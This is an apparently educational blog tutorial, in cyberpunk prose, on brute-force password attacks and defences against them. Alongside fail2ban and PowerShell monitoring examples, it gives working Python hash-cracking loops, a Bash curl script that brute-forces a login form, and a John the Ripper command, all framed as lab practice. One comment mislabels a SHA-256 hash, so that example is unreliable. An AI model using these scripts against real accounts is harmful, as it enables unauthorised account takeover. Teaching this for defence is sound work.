The Brute Force

⏳ 9 min read min read

Table of Contents

    Cybersecurity Illustration

    In the neon glow of a rain-slick alley, behind flickering holo-ads and the hum of automated drones, the network lies bare. You hear the keys clacking in back-rooms, the pinging servers broadcasting their vulnerabilities, waiting for someone to peel back their passwords. You are drawn in, heart pounding, because this is the edge of chaos. Where identity is code, secrets are shadows, and brute force is the battering ram smashing entry.

    In this world you could be Trinity, ghosting through firewalls, or Neo discovering passwords like hieroglyphs. You could be someone watching in awe and dread, called to understand the lure of brute force attacks, not to wield them for evil, but to shield systems, to build defences that yield data safety. Because once you know how the brute force attacks thump their way inside, you see where to block them, where to fortify. Let me take you there.

    What Is Brute Force, In the Flickering Light

    Brute force means trying all possible combinations until the lock gives way. Username-password pairs, token codes, SSH logins, PINs, every secret is an assault target. Attackers, from bored script kiddies to seasoned cyber-mercenaries, write tools, automate attempts, dispatch millions of guesses per second. In that effort, speed, patterns, and scale are the ammunition.

    There are several kinds:

    • Simple brute force: try every possible password of a given length over a character set.
    • Dictionary attack: use a curated list of probable passwords, maybe combined with common substitutions (like “P@ssw0rd”).
    • Hybrid attack: dictionary plus mangling rules (add digits, insert symbols, change case).
    • Credential stuffing: reuse of username-password pairs leaked elsewhere.

    Why It Works, Why It Fails

    Brute force succeeds when defences are weak. Long or complex passwords not enforced, no rate-limiting, multi-factor authentication missing, default usernames unchanged. Weak hashing can be brute forced offline. But there are powerful guards: account lockouts, CAPTCHAs, delayed responses, strong hashing (bcrypt, Argon2), salted hashes, hardware security modules.

    Where to Begin As A Defender

    Enforce Strong Password Policies

    Make minimum lengths, require a mix of letters, digits, symbols and both lower-case and upper-case characters. But also think about usability: password managers are key.

    Implement Rate-Limiting and Account Lockouts

    Delay or block after a number of failed attempts. For example in web apps, use tools like fail2ban.

    Here is a simple Bash snippet for fail2ban configuration to block IPs with repeated SSH failures. This is defensive code; misuse could lock out legitimate users. 

    bash
# /etc/fail2ban/jail.local addition
[sshd]
enabled  = true
port     = ssh
filter   = sshd
logpath  = /var/log/auth.log
maxretry = 5
bantime  = 3600     # Block for one hour
findtime = 600      # Count failures within ten minutes

    Use Multi-Factor Authentication (MFA)

    Even if an attacker brute forces a password, without the second factor the account remains inaccessible.

    Where To Look As An Off-ensive Researcher

    Note: the following is for educational, lawful, ethical exploration only. Never use these techniques against systems you do not own or have permission to test.

    Python Script to Test a Wordlist Against Local Hashes

    If you have access to password hashes locally, you could test potential passwords using Python. This is useful for auditing own passwords and system security. 

    python
import hashlib

def check_hash(password, salt, target_hash):
    # Example uses SHA256; in real systems stronger hash functions exist
    h = hashlib.sha256((salt + password).encode('utf-8')).hexdigest()
    return h == target_hash

hashes = [
    { 'salt': 'abc123', 'hash': '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd...'},
    # add more
]

with open('wordlist.txt') as f:
    for word in f:
        word = word.strip()
        for entry in hashes:
            if check_hash(word, entry['salt'], entry['hash']):
                print(f"Found password for hash {entry['hash']}: {word}")

    This helps you understand how weak passwords can be recovered if your policies are lax.

    Technical Layers of Defence

    Here are layered strategies to harden systems:

    Layer Defence Measure
    Network-edge Firewalls, VPNs, IP whitelisting
    Application level Login attempt throttling, CAPTCHA, honeypots
    Credentials Enforce strong passwords, use password managers, rotate credentials
    Hashing & Storage Use bcrypt or Argon2 with strong parameter settings, salt every password uniquely
    Monitoring & Logging Track failed attempts, unusual login times, geography, alert on anomalies

    Sample PowerShell Script to Monitor SSH-like Failures on Windows

    Suppose you want to monitor failed Remote Desktop Protocol (RDP) logins or similar attempts:

    powershell
$events = Get-EventLog -LogName Security -After (Get-Date).AddDays(-1) -InstanceId 4625
$failedLogins = $events | Where-Object { $_.AccountName -ne "ANONYMOUS LOGON" }
$grouped = $failedLogins | Group-Object -Property { $_.IpAddress }
foreach ($group in $grouped) {
    if ($group.Count -gt 10) {
        Write-Output "Potential brute-force from IP $($group.Name): $($group.Count) failed attempts"
    }
}

    You may configure alerts when count exceeds threshold, or automate blocking behaviour. This script is defensive in nature. Misconfiguration could miss attacks or generate false positives.

    Estimating Time Cost: How Long Does Brute Force Take?

    Understanding attacker perspective helps build your defence. Suppose passwords are:

    • 8 characters
    • Only lower-case letters (26 choices per position)

    Total combinations = 26⁸ ≈ 200 billion. At 1,000 attempts per second that is ~200 million seconds, or over 6 years.

    If you increase to:

    • 10 characters
    • Upper and lower case, digits, symbols (~95 choices)

    Combinations ≈ 95¹⁰ ≈ 59 quintillion. Even at a million attempts per second, that is many hundreds of years.

    Real attackers use GPU clusters, cloud capacity, but also target weaker paths: reused passwords, predictable patterns, unprotected services.

    Watching Out For Common Vulnerabilities

    Look for:

    • Plain-text storage of passwords
    • Weak hash functions (MD5, SHA1 without salt)
    • Login endpoints without protection or visibility
    • Default usernames like “admin” or “root”
    • Services open to the internet without controls

    Tooling and Simulations

    Set up a local lab. Run Hydra or John the Ripper on dummy services. See how fast you can crack a simple SSH login with a bad password. Measure the time, see how slow bcrypt or Argon2 slows you. Use OWASP Juice Shop to practise.

    Building Practical Brute-Force Skills

    Aim

    You will learn how brute-force attacks work in cybersecurity, understand where they succeed or fail, and practise building and defending them through hands-on examples.

    Learning outcomes

    After completing this guide you will:
    - Understand what brute-force attacks are, types (e.g. online, offline), and their typical targets;
    - Be able to write and run a simple brute-force script in Python and use Bash tools to test password strength;
    - Recognise defensive measures (rate limiting, account lockouts, strong hashing) and implement basic defences;
    - Assess risk by estimating attack time, complexity and probability of success; use that to inform security policy.

    Prerequisites

    • Basic knowledge of Linux command-line, Python (required versions 3.x), or PowerShell;
    • A test environment: a local machine or virtual machine where you own permissions; do not attack any system without authorisation;
    • Common tools installed: Python, Bash shell (or equivalent), and optionally tools like hydra, john or hashcat for offline cracking;
    • Sample target: either a simple login form you control or a hashed password file for offline attempts.

    Step-by-step guide to improving brute-force skills

    1. Grasp core concepts

    • Define brute force: trying many possible passwords until one works. Two main types: online (against live login forms) and offline (against saved password hashes).
    • Learn about factors that make brute force feasible or not: password length & complexity, hashing algorithm strength, rate limits, network latency.

    2. Practice a simple offline brute-force attack in Python

    Create a small script to test a list of candidate passwords against a hash. Use bcrypt or sha256 for practice. 

    python
import hashlib

# example hashed password: sha256 of "Secr3t!"
target_hash = "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd1674011c9d780b4e1"

def test_password(candidate):
    return hashlib.sha256(candidate.encode()).hexdigest() == target_hash

with open("wordlist.txt", "r") as f:
    for line in f:
        pwd = line.strip()
        if test_password(pwd):
            print(f"Password found: {pwd}")
            break
    else:
        print("Password not found in list")
    • Prepare a wordlist.txt with common passwords or generated combinations.
    • Observe performance: how many hashes per second, how many tries, time taken.

    3. Use Bash tools to try online brute-force (lab only)

    Set up a dummy login form locally or use a safe test target. Use tools like curl or wget in Bash to automate POST requests.

    bash
#!/bin/bash
url="http://localhost/login"
user="admin"
while read -r pwd; do
  response=$(curl -s -X POST -d "username=$user&password=$pwd" "$url")
  if echo "$response" | grep -q "Login successful"; then
    echo "Password found: $pwd"
    break
  fi
done < wordlist.txt
    • Run this in a controlled environment.
    • Measure response times, check if responses vary (slowdowns, error messages) that could hint at defences.

    4. Try established tools for offline cracking

    Use john or hashcat on hash files to compare against dictionaries and rules.

    Example john usage:

    bash
john --wordlist=wordlist.txt --format=raw-sha256 hashes.txt
    • Analyse outputs: which hashes cracked, how long, which rules helped (e.g. capitalisation, appending digits).

    5. Build defences and test resistance

    • Implement rate limiting: configure login system to allow only a few attempts per minute.
    • Enforce account lockout after repeated failures.
    • Use strong salted/hash functions (bcrypt, Argon2) for stored passwords.
    • Require complex passwords: minimum length, character variety.

    Set up a test: re-run your brute-force scripts/tools after applying defences and observe increase in required time.

    6. Estimate attack feasibility

    • Calculate keyspace: for example, for an 8-character password from 95 printable characters, keyspace is (95^8).
    • Estimate hash rate you can reach (on your test machine or with common hardware). Divide keyspace by hash rate to get time to exhaust.
    • Compare with expected time window (e.g. before account locks, session timeouts).

    Actionable tips to speed learning

    • Use small practise setups you control to avoid legal issues;
    • Keep a log of experiments: what wordlists were successful, what defence slowed attacks;
    • Try combining attacks: dictionary + mangling rules + brute-force tailing;
    • Visualise results: chart cracked percentage vs password length or complexity;
    • Stay up-to-date: follow reports of industry password breach analysis to understand real-world attack preferences.

    By following these steps you will gain both the knowledge and practical experience to understand how brute-force attacks are built, how to defend against them, and how to assess when they pose a realistic threat.

    You walk back across that rain-soaked pavement, heart still racing. You know now how brute force rises like tide, how temperature builds in each login attempt, how every weak password is an open door. You also carry tools and knowledge, ready to build defences in that hollow neon world, so the next intruder finds walls, not windows.